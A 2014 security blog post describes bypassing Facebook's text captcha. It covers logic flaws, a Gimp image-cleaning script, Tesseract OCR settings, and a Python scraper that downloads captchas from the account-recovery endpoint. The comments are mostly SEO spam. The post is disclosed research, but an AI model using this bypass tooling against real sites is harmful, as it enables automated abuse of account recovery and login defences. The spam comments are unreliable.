Thursday, 10 July 2014

How to Bypass Facebook's Text Captcha

In this post I'll discuss Facebook's text captcha and how to bypass it with a little Gimp-Fu image cleaning and Tesseract OCR. The techniques below build on previous work where I demonstrated how to bypass Bugcrowd's captcha.


The Facebook Captcha(s)

I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).


The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:


Let's look at some ways to bypass the text captcha :)


A couple of logic flaws...

My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.

Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.

Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.

Issue #3 - Captcha repetition...


Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.

The logic flaws were interesting but let's not forget OCR as well!


Back to the image...

Let's take a look at a Facebook captcha image:


When thinking about OCR analysis there's some things to note:
  • Letters/numbers themselves are clearly displayed in black - Good
  • Minimal overlaying, wiggling and distortion is used - Good
  • Black scribbles add noise to the background - Bad
  • White scribbles effectively remove pixels from the characters - Bad
I did some testing with Tesseract and found noise, image size, character size and spacing all had a big impact on the accuracy of results. For example, directly analysing the image above will return invalid characters or no response at all. To improve Tesseract results I needed some way to get rid of the noise and repair damaged characters.


Step #1 Cleaning 

I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.

So first up I loaded the image and increased its size, I found processing a smaller image was less accurate and would reduce the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size
pdb.gimp_image_scale(image,560,142)

Next I removed the background noise. By selecting by black and then shrinking the selection, the thin black lines would be unselected, leaving just the black letters. To actually paint over the noise I just had to re-grow my selection, invert and paint white.
#Select by color black
pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
#Shrink selection by 1 pixel
pdb.gimp_selection_shrink(image,1)
#Grow selection by 2 pixels
pdb.gimp_selection_grow(image,2)
#Fill black
pdb.gimp_context_set_foreground((0,0,0))
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
#Fill white
pdb.gimp_context_set_foreground((255,255,255))
pdb.gimp_edit_fill(drawable,0)

With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
pdb.gimp_selection_invert(image)
pdb.gimp_context_set_foreground((0,0,0))
#Translate selection up 4 pixels and paint
pdb.gimp_selection_translate(image,0,4)
pdb.gimp_edit_fill(drawable,0)
#Translate selection down 10 pixels and paint
pdb.gimp_selection_translate(image,0,-10)
pdb.gimp_edit_fill(drawable,0)

With the processing done I resized the image back to its original size and saved it.
#Resize image
pdb.gimp_image_scale(image,280,71)
#Export
pdb.gimp_file_save(image, drawable, file, file)
pdb.gimp_image_delete(image)

I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"

As an example, cleaning the image above I got this:



Step #2 Submitting to Tesseract

With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.jpg output -psm 8 nobatch fb

I created the fb character set in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs", it contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890


Step #3 Automate everything with Python

I didn't bother to build a fully working POC to automate a real attack - I'm leaving this step as homework for you guys, best script wins $1 via Paypal ;) (I am of course joking don't actually do this!)

Theoretically though if you did want to build a fully functioning script you'd just need to take the python script from my Bugcrowd post and cleaning script from this post, combine and pwn.

Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
from urllib.error import *
from urllib.request import *
from urllib.parse import *
import re
import subprocess

def getpage():
    try:
        print("[+] POSTing to fb");
        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://www.facebook.com/ajax/login/help/identify.php?ctx=recover")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfco_1iUuf5XPNAuu9SBYhFnEoJfgxIw_9vwHlTfaTRjGB2Ac4VOSLHb018RjcLg3JVRsiY-sQlRSM00X59eKhLh5SJGHltQ0hEQ2WAiRR9A_g%26smuh%3D28853%26lh%3DAc-vs8zSU-_-6kh2%26aik%3Dqh9ABV52OPB3zXxCyUTNXw;')
        #Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        global ccode
        ccode = re.findall('[a-z0-9-]{43}', response)
        global chash
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response");
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

def getcaptcha(i):
    try:
        print("[+] Downloading Captcha");
        captchaurl = "https://www.facebook.com/captcha/tfbimage.php?captcha_challenge_code="+ccode[0]+"&captcha_challenge_hash="+chash[1]
        urlretrieve(captchaurl,'fbcap'+str(i)+'.png')
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

print("[+] Start!");
for i in range(0, 1000):
    #Download page and parse data
    getpage();
    #Download captcha image
    getcaptcha(i);
print("[+] Finished!");



Final Results

So I guess you're wondering, how accurate was Tesseract? Well on a sample of 50 captchas that had been cleaned with Gimp, Tesseract was able to analyse them 100% correctly about 20% of the time. However taking into account the logic flaws the actual pass rate jumped to 50%.

Some example results:


It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. Although you can also see how even subtle changes in the initial image can significantly affect both cleaning output and final analysis.


Facebook Fix #1

After reporting these issues the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:


Unfortunately this had little effect on the captcha strength as it's the noise to character relative thickness that mattered not the absolute thickness. Making the noise thicker and characters thinner, would have prevented noise removal through selection shrinking.


Final Thoughts

Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass-rate, I'm sure with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.

Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.

Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.

Pwndizzle out


############################################
#Gimp-Fu cleaning script, based on stackoverflow script here:
#http://stackoverflow.com/questions/12662676/writing-a-gimp-python-script?rq=1

from gimpfu import pdb, main, register, PF_STRING

def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    pdb.gimp_image_scale(image,560,142)
    #Select by color black
    pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
    #Shrink selection by 1 pixel
    pdb.gimp_selection_shrink(image,1)
    #Grow selection by 2 pixels
    pdb.gimp_selection_grow(image,2)
    #Fill black
    pdb.gimp_context_set_foreground((0,0,0))
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    #Fill white
    pdb.gimp_context_set_foreground((255,255,255))
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    pdb.gimp_context_set_foreground((0,0,0))
    #Translate selection up 4 pixels and paint
    pdb.gimp_selection_translate(image,0,4)
    pdb.gimp_edit_fill(drawable,0)
    #Translate selection down 10 pixels and paint
    pdb.gimp_selection_translate(image,0,-10)
    pdb.gimp_edit_fill(drawable,0)
    #Resize image
    pdb.gimp_image_scale(image,280,71)
    #Export
    pdb.gimp_file_save(image, drawable, file, file)
    pdb.gimp_image_delete(image)

args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)

main()

############################################

21 comments:

  1. this is a great deduction.

    ReplyDelete
  2. Hi,

    Your gimp script is no more remove all the disturbance from the image. I am creating facebook captha reader. Would you help me in this?

    ReplyDelete
  3. Your gimp script is no more remove all the disturbance from the image. I am creating facebook captha reader. Would you help me in this?
    Reply

    ReplyDelete
  4. Unfortunately I'm busy with other work right now. Don't give up though, filtering should be able to help with a lot of different captcha variations :)

    ReplyDelete
  5. I should say only that its awesome! The blog is informational and always produce amazing things.
    facebook

    ReplyDelete
  6. I'm so glad and enjoyed your BLOG, It is very informative on the subject or topic, and Thanks For Sharing this post. I have something to share here norton.com/setup
    www.norton.com/setup

    ReplyDelete
  7. Great information, I was searching for this kind of information, thank you very much for sharing with us. i also have some links to share norton.com/setup


    www.norton.com/setup

    ReplyDelete
  8. I found this is an informative blog and also very useful and knowledgeable. I would like to thank you for the efforts you have made in writing this blog www.avg.com/retail

    www.avg.com/activate

    avg.com/activate

    avg.com/retail

    ReplyDelete
  9. Roku is a streaming device, which is a reasonable roku activation and other Set-up Box. Roku is a bundle of amusement, where client can stream for boundless motion appears, web arrangement, news, animation and a lot more projects.

    ReplyDelete
  10. Attempt office.com/setup which is extremely simple to install, download and recover. Utilization of it is additionally straightforward and the client can become familiar with the utilization of it without any problem. office.com/setup Online Support&help alternative is likewise accessible in all application which gives a moment rule.Microsoft office.com/myaccount Office Setup is the complete bundle of Microsoft programs as it takes to the a variety of jobs, servers, and affiliations like PowerPoint, Excel, Word, Outlook, Publisher, OneNote, and Access.

    To activate office setup you need to visit office.com/setup where you can find what all you can do on office setup.office Remote turns your phone into a smart remote that interacts with Microsoft Office on your PC. office.com/setup The app lets you control Word, Excel, and PowerPoint from across the room, so you can walk around freely during presentations.You will use your Microsoft account for everything you do with Office . office.com/setup If you use a Microsoft service, such as Outlook.com, OneDrive, Xbox Live, or Skype, you already have an account.

    ReplyDelete
  11. Download norton antivirus to make your computer virus free with the best support and tech team. norton.com/setup Feel free to contact us. Norton web security is commonly used antivirus gives the least requesting to use and most intutive affirmation for your PC and your mobiles .present it and negligence viruses,spyware,root-units - , Download norton 360 hackers.https://my.norton.com/home/setup for more nuances visit.To enact the Norton setup, select the Activate Now option at the base. To recharge the membership for Norton, select the Help choice and snap on Enter item key. https://my.norton.com/home/setup Cautiously type the right Norton item key in the clear. Snap on the Next catch.Go through with for more details.

    Download Norton Mobile Security and Antivirus https://my.norton.com/onboard/home/setup application that can shield your records from getting affected from any online malware or contamination norton setup product key.Go to the Norton Security Online page and click Get Norton Security Online. Type in your Xfinity ID and password, if you're asked. Create a Norton account, then sign in. https://my.norton.com/onboard/home/setup Choose whether you want to install it on this device or another one. Start your installation. Click Run. Let the program run. If Windows asks for permission, click Yes.

    ReplyDelete
  12. Go to Roku page record enter Roku com association code appeared on Roku TV. roku.com/link My Roku com associate not working use new Roku code.Roku is a streaming device, which is a reasonable roku setup and other Set-up Box. Roku is a bundle of amusement, roku.com/link where client can stream for boundless motion appears, web setup, news, animation and a lot more projects.Giving users an unparalleled streaming experience, Team roku.com/link takes great pride in being the number one streaming service providers in the world.

    Sanction Roku associate, go to roku.com/link record enter Roku interface code appeared on Roku TV. My roku com interface not working use new Roku code.To download click for more subtleties. Roku is a gushing gadget, which is a sensible roku setup and other Set-up Box.roku.com/link Roku is a heap of diversion, where customer can stream for unlimited movement shows up, web game plan, news, liveliness and significantly more activities.Roku works by downloading video from the web, you at that point watch on your TV. The video isn't spared as it's viewed while Roku downloads or "streams" the video. Applications or "stations" are programs you load onto your Roku gadget that give you different films and TV appears. roku.com/link This works a lot of like introducing applications on a cell phone or tablet.

    ReplyDelete
  13. Roku provides the simplest way to stream entertainment to your TV. On your terms. roku.com/link With thousands of available channels to choose from.Roku enables you to choose what gives you need to watch, and when you need to watch them. roku.com/link It resembles sitting in front of the TV as though everything is on-request. roku.com/link Since Roku extraordinarily extends your on-request alternatives, you may even need one to enhance your link membership as opposed to supplanting it. I'll really expound on that later in the guide.Roku gives the least complex approach to stream stimulation to your TV. On your terms. roku.com/link With a large number of accessible channels to look over.

    ReplyDelete
  14. Are you looking for activating your Roku com link? roku.com/link This can turn your tv into up to date streaming gadget, Rokucomlink you can stay advanced and stay.Learn how to link the Roku player to your TV using. Enter the Roku activation code which displays on your TV screen in roku.com/link page. Activate roku device Follow the Quick Start Guide that accompanied your Roku gadget. For extra help setting up your Roku gadget, roku.com/link visit the Setup and Troubleshooting segment of the Roku site given above.


    Roku offers the accompanying seven gushing gadgets. There are five set-top gushing boxes, the Roku Ultra, Roku Premiere, Roku Premire+, Roku Express, and Express+. Roku.com/link Roku Activation Code At that point there are two sticks, the Roku Streaming Stick and Roku Streaming Stick Plus.Roku.com/link - Steps to interface your Player to your TV. Roku activate gadget is the easiest method to stream stimulation to your TV. Roku.com/link visit for roku .Stream hundreds of hit movies, TV shows and more Roku.com/link on the go with The Roku Channel, use it as a second remote, enjoy private listening, and more.

    ReplyDelete
  15. Webroot AntiVirus is a not too bad, secure program that successfully sees and shields you from Mac malware. webroot key code activation It has safe program remembers that single work for Safari, which also makes Webroot's less practical at perceiving a couple of Windows perils. Webroot digital security is an extreme web security suite for complete assurance against the present different scope of danger on windows. key highlights are 100% secure shopping, 1 snap infection examining, pernicious site separating, unblock antivirus.webroot.com/safe if you need to introduce it at that point visit our site:Webroot AntiVirus keeps watch on obscure projects until its cerebrum in the cloud goes to a judgment. The small nearby program clears out the assailant and turns around its activities. webroot.com/safe It's an exceptionally unordinary framework, however testing demonstrates that it carries out the responsibility, and does it well.

    ReplyDelete